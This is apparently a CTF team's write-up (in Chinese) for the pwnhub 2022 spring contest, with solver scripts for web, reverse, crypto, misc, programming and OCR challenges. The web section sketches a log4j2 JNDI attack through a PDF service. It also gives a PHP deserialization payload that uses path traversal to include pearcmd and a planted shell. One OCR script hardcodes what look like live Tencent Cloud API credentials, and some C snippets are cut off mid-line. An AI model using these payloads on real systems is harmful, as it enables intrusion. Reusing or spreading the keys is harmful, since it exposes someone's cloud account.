pwnhub2022春季赛 wp
菜捏,本来还说努努力恰个钱,结果大家都是套皮究极联队。搞了两天经典纪念品,taxi了
几个人小作坊式的恰钱计划还是打不过联队捏。好烦哦
题目整体难度不是很大。但是那个传奇实在是有点技术盲区
最后除了null究极碾压全场之外,剩下几个队都只差一点点。多出一个题就恰饱饱了呜呜。据说null还去mrctf大杀四方,人多就是好啊呜呜
web
ezpdf
pdfbox+log4j2
jdk版本8u181随便打jndi
百度搜索可得,复制粘贴打通
https://github.com/eelyvy/log4jshell-pdf
按照说明把/size后面的数字改成payload,marshal开一个ldap refer server一键打通
第一天搜索能力有限想着自己找,用tabby之类的,结果tabby究极出bug,现在找原因。。
esay cms
mysql处rouge mysql读文件,读文件后发现testtool存在直接的反序列化点,反序列化的结果会直接带上()动态执行,故可以通过动态调用数组的方式来调用类方法,审计代码发现route类的getView方法可以通过改变route类的class值来实现任意php文件包含,而环境里存在pearcmd,故直接包含pearcmd写一个shell,再包含这个shel即可
<?php
class route
{
protected $toolVar = '123';
protected $mode = 'index';
#protected $class = '../../../../../../../../../usr/local/lib/php/pearcmd';
#protected $class = '../../../../../../../../../var/www/html/index';
protected $class = '../../../../../../../../../tmp/shell';
}
$a = array(new route(),'getView');
echo urlencode(serialize($a));
rmb神仙用go写的rouge mysql好稳的捏
baby flask
显然的ssti点,但是由于缓存的存在即使复写模板也不会再次渲染。简单debug找到cache定义,LRUcache默认容量400
写个破烂一直访问create创建500个模板然后前面一百个任意ssti
复制粘贴一个payload打通
简单的说,web的题都挺水的。。。
然后我全知全能lgw秒杀接下来的绝大多数题目,由于汇总了wp就一起贴一下
re
letsgo
res = [0x07,0x0A,0x14,0x55,0x1C,0x51,0x57,0x5C,0x10,0x02,0x02,0x4F,0x51,0x18,
0x03,0x04,0x05,0x4D,0x1A,0x19,0x51,0x4E,0x53,0x01,0x09,0x0D,0x43,0x00,
0x4F,0x52,0x5A,0x5C,0x40,0x02,0x01,0x4B,0x52,0x03,0x4C,0x1B,0x52,0x50]
flag = []
i = 0
while i < 0x2A:
res[i+2] = res[i+2] ^ res[i+1]
res[i+1] = res[i] ^ res[i+1]^res[i+2]
res[i] = res[i] ^ res[i+2]
i = i + 3
for i in res:
print(chr(0x7f-i),end='')
#flag{2d830225-d367-47c0-851b-b9ec765ba0f4}
misc
眼神得好
import cv2
import numpy as np
from PIL import Image
img=cv2.imread('out.bmp')
img2=img[:,4:]^img[:,:-4]>0
Image.fromarray(img2[:,:,0]).save('out1.bmp')
#flag{nice_pwnhub}
crypto
esrsa
from Crypto.Util.number import *
x,y=(338555080220637081961629108201515088631648910827927160728143665306856840891283037339677849661861227903908933145477264046446986150577658634798201036502060805774599658207669111688439996110692201008037849119605962378316457201998475046620515963725786423440494993922281942396227626532022005579340476627086260000576524772862121364339849726687865874619472513654142054490221489754144358483093331358263771080584662872680106076787261957704707055652825959314984924849600101, 936859805496385391559236776246883920797971062581544240268575675825570737296851006237870839271568976317212531276234406232945021531066674291887782791534409966305833225084692612867437424551505174720475931132798839349207246806850341280754752239303350596733681932273450149927797735966407187594725231158980098119489003450563623494155562513634618466910170109518754662675054081897025489520391417883488720972781393802142478712026232107041683271177224983497203599032383279)
n=988000511804778695813521569460767024014375863209856154754147082419975777208656083311740358048468580712106204105426217752071608551112269505247365548210006567296850568411531004204795967810292432041395592133501302461324005142940183488044983348152371980166614840414803124031222965874472013554869981954785271467321919039144942853506143787908194930700818770224752026306092706366253640515130802157497666497193713819097381223915943111321812676982912146706199692543488639
e=0x10001
F.<q>=Zmod(n)[]
f=(1+2*x)*q+(2*(x**3-y**2)-1)
q=int(f.monic().small_roots(beta=0.5,X=2**512)[0])
p=n//q
E=EllipticCurve(GF(q), [p+q, p**2+(q-1)//2])
phi=E.order()
G=E(x,y)*inverse_mod(e,phi)
flag=long_to_bytes(int(G.xy()[0]))[:-20].decode()
print(flag)
rootrsa
直接在Zmod(n)上对c连续四次开方即可
ppc
baby line
#include
int main()
{
int t,m,n,k,c;
scanf("%d",&t);
while(t--){
scanf("%d%d%d",&m,&n,&k);
int a[m];
for(int i=0;i hilbert
#include
int t1[7]={0,2,4,1,3,6,5};
int t2[7]={0,3,1,4,2,6,5};
int f(int n,int x,int y){
//printf("%d %d %d\n",n,x,y);
if(x==1&&y==1)return 0;
if(x==(1<(1<<(n-1))&&y<=(1<<(n-1)))return t2[f(n-1,y,(1< gaming
是兄弟就来砍我
创号登录公告区即可获取flag
初入门径
看到别人在打boss然后上去蹭拿到了flag之书01
描述即为flag
擂台决斗
不知道怎么搞捏,最后这个题看了一晚上没出,然后最后时刻就看大伙藏的flag掏出来大杀四方喜提纪念品了。无语捏
因为抓包没有抓到什么流量,感觉整个flash游戏基本上都是前端在操作,然后去研究swf,似乎逻辑都在这个里面,那么flag物品的描述应该也在这里面,然后就没有然后了,下了swf解包器对着swf文件一个个看,结果一无所获。钱钱离我而去
other
签到
扫二维码拿到flag
words check
import requests
import hashlib
import urllib
import base64
import time
import json
from tencentcloud.common import credential
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.ocr.v20181119 import ocr_client, models
secret_id = "AKIDd4E7jAJJyLUMyJxMWP1NTKtkMhkWYGDv"
secret_key = "avzlJdgRw97qHRO5Vf6HBn8E2ZnEQKwH"
def ocr(data):
params = '{"ImageBase64":"' + data + '"}'
cred = credential.Credential(secret_id, secret_key)
httpProfile = HttpProfile()
httpProfile.endpoint = "ocr.tencentcloudapi.com"
clientProfile = ClientProfile()
clientProfile.httpProfile = httpProfile
client = ocr_client.OcrClient(cred, "ap-guangzhou", clientProfile)
req = models.GeneralBasicOCRRequest()
req.from_json_string(params)
resp = client.GeneralBasicOCR(req)
return resp.TextDetections[0].DetectedText
url='http://47.97.127.1:26432'
token=requests.get(url+'/getToken').json()['data']['token']
words=requests.get(url+'/getViolWords').json()['data']['violWords']
for i in range(50):
res=requests.post(url+'/getPic',json={'token':token}).json()
data=res['data']['words']['w1']
sentence=ocr(data)
f=any((word in sentence) for word in words)==False
res=requests.post(url+'/submits',json={'token':token,'answer':f}).json()
print(i,res)
res=requests.post(url+'/getFlag',json={'token':token}).json()
print(res)
medium black ocr
from PIL import Image,ImageDraw,ImageFont
import numpy as np
import pytesseract
import requests
import string
import base64
import io
FONT_SIZE = 30
TEXT_LENGTH = 10
FIG_SHAPE = (FONT_SIZE * TEXT_LENGTH // 2 + 20, FONT_SIZE + 8)
def array2b64(np_array):
buffer = np_array.tobytes()
return base64.b64encode(buffer)
def b642array(bb64_buffer, reshape=(FIG_SHAPE[1], FIG_SHAPE[0])):
try:
x = np.frombuffer(base64.b64decode(bb64_buffer), dtype=np.float32)
x = x.copy() # frombuffer的数据不可写
x *= 255
x = x.astype(np.uint8)
x = x.reshape(reshape)
return x
except Exception as e:
print(e)
print("No Hack ! BAD BUFFER")
return False
def generate_fig(text_raw, font_size=FONT_SIZE):
s = io.BytesIO()
im = Image.new("L", FIG_SHAPE, 255)
dr = ImageDraw.Draw(im)
font = ImageFont.truetype("ubuntu.ttf", font_size)
dr.text((0, 0), text_raw, font=font, fill="#000000")
im.save(s, 'png')
return Image.open(s)
def _predict(x):
"""
use py tesseract to predict image
:param x:
:return:
"""
x = Image.fromarray(x, mode='L')
if not (x.size == FIG_SHAPE and x.mode == 'L'):
return "img format error"
try:
result = pytesseract.image_to_string(x, config=" tessedit_char_whitelist=abcdefghijklmnopqrstuvwxyz ")
result = result.strip()
result = result.replace("\n", "")
result = result.replace("\x0c", "")
return result
except Exception as e:
print(e)
return ""
imgs={}
for c in string.ascii_lowercase:
imgs[c]=np.array(generate_fig(c*10),dtype=np.float32)[:,:15]
url='http://47.97.127.1:26857'
br=requests.Session()
for k in range(100):
res=br.get(url+'/start').text
origin=res[res.find(' `')+2:res.find('` ')]
target=res[res.find('as `')+4:res.find('`.')]
img=np.array(generate_fig(origin),np.float32)
ms=[]
for i in range(10):
if origin[i]==target[i]:
ms.append(imgs[origin[i]])
else:
ms.append(imgs[origin[i]]*0.5+imgs[target[i]]*0.5)
ms.append(np.ones([38,20],dtype=np.float32)*255)
img2=np.hstack(ms)
res=br.post(url+'/predict',{'b64_image':array2b64(img2*255)}).text
print(k,origin,target,res)
if res==target:
res=br.post(url+'/get_flag',{'b64_image':array2b64(img2*255)}).text
print(res)
break